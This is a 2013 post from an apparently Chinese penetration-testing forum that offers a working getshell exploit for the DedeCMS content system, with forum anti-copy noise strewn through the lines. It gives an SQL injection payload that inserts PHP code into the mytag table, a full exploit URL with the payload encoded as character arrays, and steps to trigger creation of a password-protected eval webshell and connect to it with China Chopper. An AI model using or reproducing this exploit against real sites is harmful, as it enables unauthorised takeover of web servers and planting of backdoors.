中国网络渗透测试联盟

标题: dedecms漏洞getshell EXP最新 [打印本页]

作者: admin    时间: 2013-6-10 16:49
标题: dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
# J" B' s& ]7 x9 [0 S& |7 ?, W- n1 }" @0 ?: U1 e
8 o; [2 R) M4 }+ [$ W9 i  e& G" [. S
作者:鬼哥
7 e) Z/ O4 _9 P
" [& s7 q) z0 ], y7 w1 S看贴不回,没JJ
* r% ~- O: V; w( f4 O  b/ N2 N8 F: P9 |1 `7 W
漏洞大家都知道是哪个。# Y& Y" f# K8 F; B8 J( T, N0 p
5 c% ~- k$ i! `( c! o1 K% W
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。% Y+ |* E3 X& L: ]% A

: \0 D6 c1 e( Z4 _但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
. o0 Z. C) T& S) s+ U$ z  B7 s% ^) h1 h" y# h, m
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
  o- m( b, U+ q/ W' g' h/ I9 X
6 g( o4 c# |, T' ?( a/ s" G' s1 i' zgetshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。" y: `$ b% ?6 R7 ^

4 ^+ s$ t. `$ y0 w. F/ V, O$ z" k但是测试了下。。失败
7 |+ ^! g, k$ q' e! r7 V0 T8 G4 j$ a
原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
% Y# n7 Y; E: Q: ^0 L) Z: J1 O% z1 o9 S
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
$ o% p$ D+ |7 d8 _7 |* F
* u; ^* p$ X. G5 ]; B9 B: fEXP:
. L) c/ o9 D% P* G  w& N2 ?- z& r' g# }; }2 i: V# q( T
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
/ v0 V# J! A" Z; P& v' N/ a  b
0 x4 O$ v: s0 D
+ O  k: |, {- x3 V- L成功增加。
! B: L  v- c7 T3 A6 x! }0 `- W. [" {" H' [7 F. i7 h- f
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
% m' T& m( x0 t& D/ u  h9 x生成一句话木马.& ~# D7 B1 S: ^8 o3 R) m
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige, Q9 y; o9 A/ b' A" Q4 {# z

) z+ Q0 e, l, U, }$ A* f测试OK。
8 t4 A" a* a) g( v4 ^2 ~, _# Z  `0 z8 `  K5 M
) a0 ]; {& u2 f7 z2 j# I





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2